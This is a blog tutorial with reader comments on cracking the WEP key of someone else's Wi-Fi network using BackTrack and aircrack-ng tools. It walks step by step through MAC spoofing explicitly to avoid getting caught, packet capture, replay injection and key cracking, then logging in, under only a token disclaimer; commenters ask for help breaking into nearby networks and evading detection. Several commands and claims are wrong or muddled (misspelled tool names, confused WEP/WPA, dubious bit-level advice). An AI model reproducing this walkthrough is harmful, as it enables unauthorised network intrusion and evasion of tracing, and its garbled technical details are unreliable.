Hacking Wifi Network Using BackTrack

wifi-hackedWifi or Wireless Fidelity is the name of a popular wireless networking technology that uses radio waves to provide wireless high-speed Internet and network connections (as if you didnt know..),Wifi has become an integral part of our lives today. Wifi is secured using a WPA protocol which intends to secure Wireless LANs like Wired LAN’s by encrypting data over radio waves,however, it has been found that WEP is not as secure as once believed.Now almost anyone can hack into a Wifi network by generating the valid WEP key using Bactrack. Read on to learn how..

Disclaimer: This tutorial is given for educational purposes only and that for any misuse of this information; the blogger cannot be held liable.

GETTING BACKTRACK

BackTrack is a slax based top rated Linux live distribution focused on penetration testing which consists of more than 300 up to date tools along with the ability of customizing scripts, configuring and modding kernels which makes it a true gem and a must have for every security enthusiastic out there. The best part – Its free and you can download it from – Remote Exploit

SETTING UP THE CARD AND THE CONSOLE

Boot up Backtrack on your virtual machine/laptop and open up the command console and type the commands as they are given –

ifconfig 

This is the Linux equivalent of ipconfig, you will see the network adaptors in your system. See which one is for Wi-Fi. A few examples are wlan0, wifi0, etc.

airmon-ng

This command will initialize the Wi-Fi network monitoring & will tell you how many networks are in range.

airmon-ng stop [Wi-Fi Card name(without the quotes)] 

This command will stop the cards broadcast and reception immediately

macchanger –mac [Desired MAC address] [Wi-Fi card name] 

This command will change the current MAC address to any MAC address you desire, so that you don’t get caught later

airmon-ng start [Wi-Fi Card name] 

You will see another extra adaptor that is set on monitor mode, use that adaptor for all further purposes in the following commands where – “[Wi-Fi card name]” appears

DUMPING PACKETS

Once you have set up all the parameters, you need to sniff and dump data packets in order to get the key. You can do so by using following commands. On the command console type these commands –

airodump-ng [Wi-Fi card name] 

Copy and paste the BSSID in the following command and execute it

airodump-ng –c [Channel Number] –w [Desired Filename for later decryption] --bssid [BSSID] [Wi-Fi Card name]

As you execute the command, you will see a certain number of beacons and data packets that will be stored in the filename you have given. The file will be stored in the root of the system drive (Click on Computer and you will see the file).The file will be present in two formats: *.cap, *.txt.

SPEEDING UP THINGS

However packet dumping is quite a slow process, we need to speed up things to save our time. Open new console after the first data packet has been stored and type the command in the new console and execute it.

airreplay-ng -1 0 –a [BSSID] –h [FAKED MAC ADDRESS] -e [Wi-Fi name (you wish to hack)] [Wi-Fi card name]

As you type this command you will see that the data packets required for breaking the key will increase dramatically thereby saving you a lot of time.

REVEALING WEP KEY

Open another console once you have around 20,000 data packets and type the following command to reveal the WEP key.

aircrack-ng –n 64 –b [BSSID] [Filename without the extension]   

wep-wifi-hackedAs you type this command, you will see that a key will appear in front of you in the given below format:
XX:XX:XX:XX

It is not necessary that the key should have exactly the same digits as shown above so please don’t freak out if you see a 10 digit or 14 digit key. Also if the decryption fails, you can change the bit level of the decryption in the command:

aircrack-ng –n [BIT LEVEL] –b [BSSID] [Filename without extension]

Remember, the bit level should be a number of 2n where n:1,2,3,4…
e.g.

aircrack-ng –n 32 –b [BSSID] [Filename without the extension] 
OR
aircrack-ng –n 128 –b [BSSID] [Filename without the extension] etc. etc.

Now just login using the WEP key you got.

Cheers..

About the Author
Rishabh Dangwal is a freelance security consultant, technoblogger and a student pursuing engineering. His tastes include fiddling with every possible piece of computers and technology he could get his hands on and sharing them to the world.


14 Comments

  • Johnny Bebad 22 May, 2010, 2:55

    Not that I would ever encourage anyone to hack a Wifi network, but if you want to test your own security you will need to make a few changes to these commands.

    1) For the macchanger command, the proper syntax is –mac not -mac

    macchanger –mac (FAKE ADDRESS) (ADAPTER)

    2) The correct command is aireplay-ng and not airreplay-ng.

  • chi 17 August, 2010, 17:04

    hello pls i need ur help.i capture about 6 wireless internet connections,but i cannot connect to any of them,because i do not have BSSID or SSID.is there anything i can do.i aill be very grateful if u offer me this assistance.i am using windows 7 and windows XP

  • Smoke Detector : 31 October, 2010, 2:05

    wireless internet is simply the best though sometimes the signal fluctuates depending on the weather condition :

  • vijay 7 December, 2010, 15:46

    i am using Windows version , i need the console, its available in the internet , pls give me step by step

  • Hacking Hamster 26 April, 2011, 3:08

    I liked your tutorial however it could be better. In my site http://www.hackinghamster.com I actually take screenshots and show you guys what I actually did. I can get the wifi WEP key in five minutes tops. My tutorial is very thorough and easy to understand. Check it out.

  • darry 11 February, 2012, 0:48

    approach can not be used and does not work. suda many times to try but to no avail.

  • rishi 4 March, 2012, 16:59

    when u are using backtrack 4 for CRACKING WIFI PASSWORD ‘” CAN IT BE TRACED DURING PACKET GATHERING BECAUSE IT TAKES TIME WHILE GATHERING PACKET ” I HAVEN’T USED THIS AND I AM NEW IN THIS …. GUIDE ME BCOZ I AM IN GERMANY…..AND THE SECURITY IS VERY MUCH tight and they are always monitering all……………so

    *if possible please don’t post it on this wall but please reply me…

  • DragonWolf 8 April, 2012, 1:49

    Rishabh has taken the time to write an excellent introduction to hacking wifi networks with Backtrack. I thoroughly enjoyed learning how to do this (for educational purposes of course).

    Don’t bother visiting the Hackinghamster site. I have just visited it and what a total waste of
    my time. It is full of advertising and as the Hamster man says: “Even if I post the tutorial up, my best advice is to not try hacking your WPA2 wifi because the process can take from hours to forever.”

    Keep up the good work Rishamh. I also enjoyed your tutorial on Winrar. Thanks.

  • jainil 11 October, 2012, 16:50

    nice

  • sean patton 16 March, 2013, 10:28

    can someone please add me to there facebook
    shpatton01@yahoo.com

    i have just installed back track 5 using Vmware player 32 bit and i cant get any of the commands to work for the wireless wifii .,. also i have tried several other commands in the root : bash and none of them are working,, PLEAAAAAAAAAASE HELP
    PLEASE ADD ME TO FACEBOOK
    my email on facebook is
    shpatton01@yahoo.com

    thank you
    God Bless

  • leiliii 23 May, 2013, 3:02

    tnx soo much for best websites
    asheqettoooooooooommmm

  • hrishi 7 October, 2013, 11:43

    wen i type airmon-ng , the interface cheapset are shown empty. plz hlp me

  • kushal 24 November, 2013, 20:10

    hello … please help me… i am stucked in the file part … how to get the file name or can use any name????

  • Damodar 18 December, 2013, 17:58

    it is only possible in Linux. ok

Leave a Reply

Your email address will not be published. Required fields are marked *

Note

To post source code in comment, use [code language] [/code] tag, for example:

  • [code java] Java source code here [/code]
  • [code html] HTML here [/code]

Current ye@r *